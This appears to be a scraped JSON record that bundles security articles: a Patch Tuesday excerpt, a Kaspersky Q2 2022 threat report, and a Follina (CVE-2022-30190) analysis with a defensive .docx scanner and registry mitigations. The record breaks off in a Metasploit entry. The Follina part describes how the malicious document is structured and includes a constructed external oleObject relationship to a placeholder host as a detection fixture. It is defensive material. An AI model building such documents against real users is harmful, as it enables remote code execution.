Adobe issued five security bulletins to address at least 18 flaws in **Adobe ColdFusion**, **Framemaker**, **InCopy**, **InDesign**, and **Adobe Character Animator**. Adobe said it is not aware of any exploits in the wild for any of the issues addressed in today's updates.\n\nFor a more granular look at the patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+May+2022+Patch+Tuesday/28632/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com>) usually has the skinny on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. 
And if you run into any problems with these patches, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T02:34:59", "type": "krebs", "title": "Microsoft Patch Tuesday, May 2022 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942", "CVE-2022-26925", "CVE-2022-26937"], "modified": "2022-05-11T02:34:59", "id": "KREBS:5FA70C019AB463F5E02A97C6891685D8", "href": "https://krebsonsecurity.com/2022/05/microsoft-patch-tuesday-may-2022-edition/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-08-15T12:01:45", "description": "\n\n * **IT threat evolution in Q2 2022**\n * [IT threat evolution in Q2 2022. Non-mobile statistics](<https://securelist.com/it-threat-evolution-in-q2-2022-non-mobile-statistics/107133/>)\n * [IT threat evolution in Q2 2022. 
Mobile statistics](<https://securelist.com/it-threat-evolution-in-q2-2022-mobile-statistics/107123/>)\n\n## Targeted attacks\n\n### New technique for installing fileless malware\n\nEarlier this year, we [discovered a malicious campaign](<https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/>) that employed a new technique for installing fileless malware on target machines by injecting a shellcode directly into Windows event logs. The attackers were using this to hide a last-stage Trojan in the file system.\n\nThe attack starts by driving targets to a legitimate website and tricking them into downloading a compressed RAR file that is booby-trapped with the network penetration testing tools Cobalt Strike and SilentBreak. The attackers use these tools to inject code into any process of their choosing. They inject the malware directly into the system memory, leaving no artifacts on the local drive that might alert traditional signature-based security and forensics tools. While fileless malware is nothing new, the way the encrypted shellcode containing the malicious payload is embedded into Windows event logs is.\n\nThe code is unique, with no similarities to known malware, so it is unclear who is behind the attack.\n\n### WinDealer's man-on-the-side spyware\n\nWe recently published [our analysis of WinDealer](<https://securelist.com/windealer-dealing-on-the-side/105946/>): malware developed by the LuoYu APT threat actor. One of the most interesting aspects of this campaign is the group's use of a man-on-the-side attack to deliver malware and control compromised computers. A man-on-the-side attack implies that the attacker is able to control the communication channel, allowing them to read the traffic and inject arbitrary messages into normal data exchange. 
In the case of WinDealer, the attackers intercepted an update request from completely legitimate software and swapped the update file with a weaponized one.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/28142531/WinDealer_dealing_on_the_side_02.png>)\n\nThe malware does not contain the exact address of the C2 (command-and-control) server, making it harder for security researchers to find it. Instead, it tries to access a random IP address from a predefined range. The attackers then intercept the request and respond to it. To do this, they need constant access to the routers of the entire subnet, or to some advanced tools at ISP level.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/28142736/WinDealer_dealing_on_the_side_05.png>)\n\nThe vast majority of WinDealer's targets are located in China: foreign diplomatic organizations, members of the academic community, or companies active in the defense, logistics or telecoms sectors. Sometimes, though, the LuoYu APT group will infect targets in other countries: Austria, the Czech Republic, Germany, India, Russia and the US. In recent months, they have also become more interested in businesses located in other East Asian countries and their China-based offices.\n\n### ToddyCat: previously unknown threat actor attacks high-profile organizations in Europe and Asia\n\nIn June, we published [our analysis of ToddyCat](<https://securelist.com/toddycat/106799/>), a relatively new APT threat actor that we have not been able to link to any other known actors. The first wave of attacks, against a limited number of servers in Taiwan and Vietnam, targeted Microsoft Exchange servers, which the threat actor compromised with Samurai, a sophisticated passive backdoor that typically works via ports 80 and 443. 
The malware allows arbitrary C# code execution and is used alongside multiple modules that let the attacker administer the remote system and move laterally within the targeted network. In certain cases, the attackers have used the Samurai backdoor to launch another sophisticated malicious program, which we dubbed Ninja. This is probably a component of an unknown post-exploitation toolkit exclusively used by ToddyCat.

The next wave saw a sudden surge in attacks, as the threat actor began abusing the ProxyLogon vulnerability to target organizations in multiple countries, including Iran, India, Malaysia, Slovakia, Russia and the UK.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/21075720/APT_ToddyCat_map.png>)

Subsequently, we observed other variants and campaigns, which we attributed to the same group. In addition to affecting most of the previously mentioned countries, the threat actor targeted military and government organizations in Indonesia, Uzbekistan and Kyrgyzstan. The attack surface in the third wave was extended to desktop systems.

### SessionManager IIS backdoor

In 2021, we observed a trend among certain threat actors for deploying a backdoor within IIS after exploiting one of the ProxyLogon-type vulnerabilities in Microsoft Exchange. Dropping an IIS module as a backdoor enables threat actors to maintain persistent, update-resistant and relatively stealthy access to the IT infrastructure of a target organization — to collect emails, update further malicious access or clandestinely manage compromised servers.

We published our analysis of one such IIS backdoor, called [Owowa](<https://securelist.com/owowa-credential-stealer-and-remote-access/105219/>), last year. Early this year, we investigated another, [SessionManager](<https://securelist.com/the-sessionmanager-iis-backdoor/106868/>).
Developed in C++, SessionManager is a malicious [native-code IIS module](<https://docs.microsoft.com/en-us/iis/web-development-reference/native-code-development-overview/creating-native-code-http-modules>). The attackers' aim is for it to be loaded by some IIS applications, to process legitimate HTTP requests that are continuously sent to the server. Malicious modules of this kind usually expect seemingly legitimate but specifically crafted HTTP requests from their operators, trigger actions based on the operators' hidden instructions and then transparently pass the request to the server for it to be processed just as any other request.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/29125614/The_SessionManager_IIS_backdoor_01.png>)

As a result, these modules are not easily spotted through common monitoring practices.

SessionManager has been used to target NGOs and government organizations in Africa, South America, Asia, Europe and the Middle East.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/29125927/01-en-the-sessionmanager-iis-backdoor.png>)

We believe that this malicious IIS module may have been used by the GELSEMIUM threat actor, because of similar victim profiles and the use of a common [OwlProxy](<https://lab52.io/blog/chimera-apt-updates-on-its-owlproxy-malware/>) variant.

## Other malware

### Spring4Shell

Late in March, researchers discovered a critical vulnerability (CVE-2022-22965) in Spring, an open-source framework for the Java platform. This is a Remote Code Execution (RCE) vulnerability, allowing an attacker to execute malicious code remotely on an unpatched computer. The vulnerability affects the Spring MVC and Spring WebFlux applications running under version 9 or later of the Java Development Kit.
By analogy with the well-known Log4Shell vulnerability, this one was dubbed "Spring4Shell".

By the time researchers had reported it to VMware, a proof-of-concept exploit had already appeared on GitHub. It was quickly removed, but it is unlikely that cybercriminals would have failed to notice such a potentially dangerous vulnerability.

You can find more details, including appropriate mitigation steps, in our [blog post](<https://securelist.com/spring4shell-cve-2022-22965/106239/>).

### Actively exploited vulnerability in Windows

Among the vulnerabilities fixed in May's "Patch Tuesday" update was [one that has been actively exploited in the wild](<https://www.kaspersky.com/blog/windows-actively-exploited-vulnerability-cve-2022-26925/44305/>). The Windows LSA (Local Security Authority) Spoofing Vulnerability ([CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>)) is not considered critical per se. However, when the vulnerability is used in a New Technology LAN Manager (NTLM) relay attack, the combined [CVSSv3](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) score for the attack chain is 9.8. The vulnerability, which allows an unauthenticated attacker to force domain controllers to authenticate with an attacker's server using NTLM, was already being exploited in the wild as a zero-day, making it a priority to patch it.

### Follina vulnerability in MSDT

At the end of May, researchers with the nao_sec team [reported](<https://twitter.com/nao_sec/status/1530196847679401984>) a new zero-day vulnerability in MSDT (the Microsoft Support Diagnostic Tool) that can be exploited using a malicious Microsoft Office document.
The vulnerability, which has been designated as CVE-2022-30190 and has also been dubbed "Follina", affects all operating systems in the Windows family, both for desktops and servers.

MSDT is used to collect diagnostic information and send it to Microsoft when something goes wrong with Windows. It can be called up from other applications via the special MSDT URL protocol; and an attacker can run arbitrary code with the privileges of the application that called up MSDT: in this case, the permissions of the user who opened the malicious document.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/08064948/01-en-cve-2022-30190.png>)

Kaspersky [has observed attempts](<https://securelist.com/cve-2022-30190-follina-vulnerability-in-msdt-description-and-counteraction/106703/>) to exploit this vulnerability in the wild; and we would expect to see more in the future, including ransomware attacks and data breaches.

### BlackCat: a new ransomware gang

It was only a matter of time before another ransomware group filled the gap left by REvil and BlackMatter shutting down operations. Last December, advertisements for the services of the ALPHV group, also known as [BlackCat](<https://securelist.com/a-bad-luck-blackcat/106254/>), appeared on hacker forums, claiming that the group had learned from the errors of their predecessors and created an improved version of the malware.

The BlackCat creators use the ransomware-as-a-service (RaaS) model. They provide other attackers with access to their infrastructure and malicious code in exchange for a cut of the ransom. BlackCat gang members are probably also responsible for negotiating with victims. This is one reason why BlackCat has gained momentum so quickly: all that a "franchisee" has to do is obtain access to the target network.

The group's arsenal comprises several elements. One is the cryptor.
This is written in the Rust language, allowing the attackers to create a cross-platform tool with versions of the malware that work both in Windows and Linux environments. Another is the Fendr utility (also known as ExMatter), used to exfiltrate data from the infected infrastructure. The use of this tool suggests that BlackCat may simply be a re-branding of the BlackMatter faction, since that was the only known gang to use the tool. Other tools include the PsExec tool, used for lateral movement on the victim's network; Mimikatz, the well-known hacker software; and the Nirsoft software, used to extract network passwords.

### Yanluowang ransomware: how to recover encrypted files

The name Yanluowang is a reference to the Chinese deity Yanluo Wang, one of the Ten Kings of Hell. This ransomware is relatively recent. We do not know much about the victims, although data from the [Kaspersky Security Network](<https://www.kaspersky.com/ksn>) indicates that the threat actor has carried out attacks in the US, Brazil, Turkey and a few other countries.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/15153446/01-en-yanlouwang-ransomware.png>)

The low number of infections is due to the targeted nature of the ransomware: the threat actor prepares and implements attacks on specific companies only.

Our experts have [discovered a vulnerability that allows files to be recovered](<https://securelist.com/how-to-recover-files-encrypted-by-yanluowang/106332/>) without the attackers' key — although only under certain conditions — with the help of a known-plaintext attack. This method overcomes the encryption algorithm if two versions of the same text are available: one clean and one encrypted.
If the victim has clean copies of some of the encrypted files, our upgraded [Rannoh Decryptor](<https://noransom.kaspersky.com/>) can analyze these and recover the rest of the information.

There is one snag: Yanluowang corrupts files slightly differently depending on their size. It encrypts small (less than 3 GB) files completely, and large ones, partially. So, the decryption requires clean files of different sizes. For files smaller than 3 GB, it is enough to have the original and an encrypted version of the file that are 1024 bytes or more. To recover files larger than 3 GB, however, you need original files of the appropriate size. However, if you find a clean file larger than 3 GB, it will generally be possible to recover both large and small files.

### Ransomware TTPs

In June, we carried out an [in-depth analysis of the TTPs (tactics, techniques and procedures) of the eight most widespread ransomware families](<https://securelist.com/modern-ransomware-groups-ttps/106824/>): Conti/Ryuk, Pysa, Clop, Hive, Lockbit2.0, RagnarLocker, BlackByte and BlackCat.
Our aim was to help those tasked with defending corporate systems to understand how ransomware groups operate and how to protect against their attacks.

The report includes the following:

 * The TTPs of eight modern ransomware groups.
 * A description of how various groups share more than half of their components and TTPs, with the core attack stages executed identically across groups.
 * A cyber-kill chain diagram that combines the visible intersections and common elements of the selected ransomware groups and makes it possible to predict the threat actors' next steps.
 * A detailed analysis of each technique with examples of how various groups use them, and a comprehensive list of mitigations.
 * SIGMA rules based on the described TTPs that can be applied to SIEM solutions.

### Ransomware trends in 2022

Ahead of Anti-Ransomware Day on May 12, we took the opportunity to outline the tendencies that have characterized ransomware in 2022. In [our report](<https://securelist.com/new-ransomware-trends-in-2022/106457/>), we highlight several trends that we have observed.

First, we are seeing more widespread development of cross-platform ransomware, as cybercriminals seek to penetrate complex environments running a variety of systems.
By using cross-platform languages such as Rust and Golang, attackers are able to port their code, which allows them to encrypt data on more computers.

Second, ransomware gangs continue to industrialize and evolve into real businesses by adopting the techniques and processes used by legitimate software companies.

Third, the developers of ransomware are adopting a political stance, involving themselves in the conflict between Russia and Ukraine.

Finally, we offer best practices that organizations should adopt to help them defend against ransomware attacks:

 * Keep software updated on all your devices.
 * Focus your defense strategy on detecting lateral movements and data exfiltration.
 * Enable ransomware protection for all endpoints.
 * Install anti-APT and EDR solutions, enabling capabilities for advanced threat discovery and detection, investigation and timely remediation of incidents.
 * Provide your SOC team with access to the latest threat intelligence.

### Emotet's return

Emotet has been around for eight years. When it was first discovered in 2014, its main purpose was stealing banking credentials. Subsequently, the malware [underwent numerous transformations](<https://securelist.com/the-chronicles-of-emotet/99660/>) to become one of the most powerful botnets ever. Emotet made headlines in January 2021, when its operations were disrupted through the joint efforts of law enforcement agencies in several countries. Takedowns of this kind do not necessarily lead to the demise of a cybercriminal operation. It took the cybercriminals almost ten months to rebuild the infrastructure, but Emotet did return in November 2021. At that time, the Trickbot malware was used to deliver Emotet, but it is now spreading on its own through malicious spam campaigns.

Recent Emotet protocol analysis and C2 responses suggest that Emotet is now capable of downloading sixteen additional modules.
We were able to retrieve ten of these, including two different copies of the spam module, used by Emotet for stealing credentials, passwords, accounts and emails, and to spread spam.

You can read our analysis of these modules, as well as statistics on recent Emotet attacks, [here](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>).

Emotet infects both corporate and private computers all around the world. Our telemetry indicates that in the first quarter of 2022, it mostly targeted users in Italy, Russia, Japan, Mexico, Brazil, Indonesia, India, Vietnam, China, Germany and Malaysia.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12151050/03-en-emotet.png>)

Moreover, we have seen a significant growth in the number of users attacked by Emotet.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12150829/02-en-emotet.png>)

### Mobile subscription Trojans

Trojan subscribers are a well-established method of stealing money from people using Android devices. These Trojans masquerade as useful apps but, once installed, silently subscribe to paid services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/10140330/trojans-subscribers-2022-screen-1.jpg>)

The developers of these Trojans make money through commissions: they get a cut of what the person "spends". Funds are typically deducted from the cellphone account, although in some cases, these may be debited directly to a bank card. We looked at the most notable examples that we have seen in the last twelve months, belonging to the Jocker, MobOk, Vesub and GriftHorse families.

Normally, someone has to actively subscribe to a service; providers often ask subscribers to enter a one-time code sent via SMS, to counter automated subscription attempts.
To sidestep this protection, the malware can request permission to access text messages; where it does not obtain this, it can steal confirmation codes from pop-up notifications about incoming messages.

Some Trojans can both steal confirmation codes from texts or notifications, and work around [CAPTCHA](<https://encyclopedia.kaspersky.com/glossary/captcha/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>): another means of protection against automated subscriptions. To recognize the code in the picture, the Trojan sends it to a special CAPTCHA recognition service.

Some malware is distributed through dubious sources under the guise of apps that are banned from official stores, for example, masquerading as apps for downloading content from YouTube or other streaming services, or as an unofficial Android version of GTA5. In addition, they can appear in these same sources as free versions of popular, expensive apps, such as Minecraft.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/05131311/Trojan_subscribers_-10.png>)

Other mobile subscription Trojans are less sophisticated. When run for the first time, they ask the user to enter their phone number, seemingly for login purposes. The subscription is issued as soon as they enter their number and click the login button, and the amount is debited to their cellphone account.

Other Trojans employ subscriptions with recurring payments. While this requires consent, the person using the phone might not realize they are signing up for regular automatic payments.
Moreover, the first payment is often insignificant, with later charges being noticeably higher.

You can read more about this type of mobile Trojan, along with tips on how to avoid falling victim to it, [here](<https://securelist.com/mobile-subscription-trojans-and-their-tricks/106412/>).

### The threat from stalkerware

Over the last four years, we have published annual reports on the stalkerware situation, in particular using data from the [Kaspersky Security Network](<https://www.kaspersky.com/ksn>). This year, our [report](<https://securelist.com/the-state-of-stalkerware-in-2021/106193/>) also included the results of a [survey](<https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/11/17164103/Kaspersky_Digital-stalking-in-relationships_Report_FINAL.pdf>) on digital abuse commissioned by Kaspersky and several public organizations.

Stalkerware provides the digital means for a person to secretly monitor someone else's private life and is often used to facilitate psychological and physical violence against intimate partners. The software is commercially available and can access an array of personal data, including device location, browser history, text messages, social media chats, photos and more. It may be legal to market stalkerware, although its use to monitor someone without their consent is not. Developers of stalkerware benefit from a vague legal framework that still exists in many countries.

In 2021, our data indicated that around 33,000 people had been affected by stalkerware.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/08160627/Stalkerware_report_2021_01.png>)

The numbers were lower than what we had seen for a few years prior to that. However, it is important to remember that the decreases in 2020 and 2021 occurred during successive COVID-19 lockdowns: that is, during conditions that meant abusers did not need digital tools to monitor and control their partners' personal lives.
It is also important to bear in mind that mobile apps represent only one method used by abusers to track someone — others include tracking devices such as AirTags, laptop applications, webcams, smart home systems and fitness trackers. KSN tracks only the use of mobile apps. Finally, KSN data is taken from mobile devices protected by Kaspersky products: many people do not protect their mobile devices. The [Coalition Against Stalkerware](<https://stopstalkerware.org/>), which brings together members of the IT industry and non-profit companies, believes that the overall number of people affected by this threat might be thirty times higher — that is around a million people!

Stalkerware continues to affect people across the world: in 2021, we observed detections in 185 countries or territories.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12144726/Stalkerware_report_2021_eng_03.jpg>)

Just as in 2020, Russia, Brazil, the US and India were the top four countries with the largest numbers of affected individuals. Interestingly, Mexico had fallen from fifth to ninth place. Algeria, Turkey and Egypt entered the top ten, replacing Italy, the UK and Saudi Arabia, which were no longer in the top ten.

We would recommend the following to reduce your risk of being targeted:

 * Use a unique, complex password on your phone and do not share it with anyone.
 * Try not to leave your phone unattended; and if you have to, lock it.
 * Download apps only from official stores.
 * Protect your mobile device with trustworthy security software and make sure it is able to detect stalkerware.

Remember also that if you discover stalkerware on your phone, dealing with the problem is not as simple as just removing the stalkerware app. This will alert the abuser to the fact that you have become aware of their activities and may precipitate physical abuse.
Instead, seek help: you can find a list of organizations that can provide [help and support](<https://stopstalkerware.org/resources/>) on the Coalition Against Stalkerware site.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-15T12:00:34", "type": "securelist", "title": "IT threat evolution Q2 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-26925", "CVE-2022-30190"], "modified": "2022-08-15T12:00:34", "id": "SECURELIST:D9AF9603FDB076FD6351B6ED483A4947", "href": "https://securelist.com/it-threat-evolution-q2-2022/107099/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-08T07:56:31", "description": "

At the end of May, researchers from the nao_sec team [reported](<https://twitter.com/nao_sec/status/1530196847679401984>) a new zero-day vulnerability in Microsoft Support Diagnostic Tool (MSDT) that can be exploited using Microsoft Office documents. It allowed attackers to remotely execute code on Windows systems even if the victim did not open the document containing the exploit, or opened it in Protected Mode.
The vulnerability, which the researchers dubbed Follina, later received the identifier [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>).

## CVE-2022-30190 technical details

Briefly, the exploitation of the CVE-2022-30190 vulnerability can be described as follows. The attacker creates an MS Office document with a link to an external malicious OLE object (_**word/_rels/document.xml.rels**_), such as an HTML file located on a remote server. The data used to describe the link is placed in the **Relationship** tag with the attributes _**Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject", Target="http_malicious_link!"**_. The link in the **Target** attribute points to the above-mentioned HTML file, inside which a malicious script is written using a special URI scheme.
When opened, the attacker-created document runs MSDT. The attacker can then pass, through a set of parameters, any command to this tool for execution on the victim's system with the privileges of the user who opened the document. What is more, the command can be passed even if the document is opened in Protected Mode and macros are disabled.
At the time of posting, two document formats were known to allow CVE-2022-30190 exploitation: Microsoft Word (.docx) and Rich Text Format (.rtf). The latter is more dangerous for the potential victim because it allows execution of a malicious command even without opening the document — just previewing it in Windows Explorer is enough.

## Protecting against Follina

Kaspersky is aware of attempts to exploit the CVE-2022-30190 vulnerability through Microsoft Office documents. Our solutions protect against this using the [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) tools.
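The external oleObject relationship described in the technical details above is visible in the document package itself, so a .docx can be triaged without ever opening it in Word. The following scanner is an added example (not Kaspersky's code and not the detection logic of the products named here); the minimal packages it builds, the relationship id rId1337 and the example.invalid target are constructed placeholders.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# OOXML relationships namespace and the relationship type that Follina documents abuse
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_OBJECT_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
RELS_PART = "word/_rels/document.xml.rels"


def scan_rels_xml(xml_bytes):
    """Inspect one document.xml.rels part and return a list of (relationship id, reason).

    A Relationship is flagged when it is an oleObject relationship whose Target is an
    external http(s) URL (the object is fetched from a remote server rather than embedded
    in the package), or when any Target uses the ms-msdt: scheme, i.e. the MSDT URL protocol.
    """
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        # A relationships part that does not even parse deserves a look of its own
        return [("-", f"unparseable relationships part: {exc}")]
    findings = []
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        rid = rel.get("Id", "?")
        rtype = rel.get("Type", "")
        target = rel.get("Target", "")
        external = rel.get("TargetMode", "Internal").lower() == "external"
        scheme = urlsplit(target).scheme.lower()
        if rtype == OLE_OBJECT_TYPE and external and scheme in ("http", "https"):
            findings.append((rid, f"external oleObject fetched from {target}"))
        elif scheme == "ms-msdt":
            findings.append((rid, f"target uses the MSDT URL protocol: {target}"))
    return findings


def scan_docx(docx_bytes):
    """Open a .docx (a zip container) held in memory and scan its main-document relationships."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PART not in zf.namelist():
            return []
        return scan_rels_xml(zf.read(RELS_PART))


# Minimal parts for a constructed sample package; real documents carry many more
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    "</Types>"
)
DOCUMENT_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    "<w:body/></w:document>"
)
# Constructed benign rels: a stylesheet plus an OLE object embedded inside the package
BENIGN_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{REL_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    f'<Relationship Id="rId2" Type="{OLE_OBJECT_TYPE}" Target="embeddings/oleObject1.bin"/>'
    "</Relationships>"
)
# Constructed suspicious rels: the oleObject is external and points at a remote HTML file
# (rId1337 and example.invalid are placeholders, not values taken from any real sample)
SUSPICIOUS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1337" Type="{OLE_OBJECT_TYPE}" Target="http://example.invalid/remote.html!" TargetMode="External"/>'
    "</Relationships>"
)


def build_docx(rels_xml):
    """Wrap the given rels part in a minimal .docx zip (constructed sample, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("word/document.xml", DOCUMENT_XML)
        zf.writestr(RELS_PART, rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("suspicious", SUSPICIOUS_RELS)):
        print(label, scan_docx(build_docx(rels)))
```

The check only covers the .docx container; the .rtf variant mentioned above has no relationships part and needs a separate rule.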
The following verdict names are possible:

 * PDM:Exploit.Win32.Generic
 * HEUR:Exploit.MSOffice.Agent.n
 * HEUR:Exploit.MSOffice.Agent.gen
 * HEUR:Exploit.MSOffice.CVE-2017-0199.a
 * HEUR:Exploit.MSOffice.CVE-2021-40444.a
 * HEUR:Exploit.MSOffice.Generic

_Geography of Follina exploitation attempts with Exploit.MSOffice.CVE-2021-40444.a verdict, May 1 – June 3, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/08064948/01-en-cve-2022-30190.png>))_

We expect to see more Follina exploitation attempts to gain access to corporate resources, including for ransomware attacks and data breaches. Therefore, we continue to closely monitor the situation and improve overall vulnerability detection. In addition, as part of the [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, our SOC experts can detect vulnerability exploitation, investigate attacks and provide clients with all necessary threat-related information.
To protect against Follina exploitation, we strongly advise that you follow Microsoft's own guidelines: [Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>). In particular, to prevent exploitation of this vulnerability, you can disable support for the MSDT URL protocol by taking these steps:

 1. Run Command Prompt as Administrator.
 2. To back up the registry key, execute the command "reg export HKEY_CLASSES_ROOT\ms-msdt filename".
 3. Execute the command "reg delete HKEY_CLASSES_ROOT\ms-msdt /f".", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-06T08:00:02", "type": "securelist", "title": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-06T08:00:02", "id": "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "href": "https://securelist.com/cve-2022-30190-follina-vulnerability-in-msdt-description-and-counteraction/106703/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-14T15:40:33", "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation.
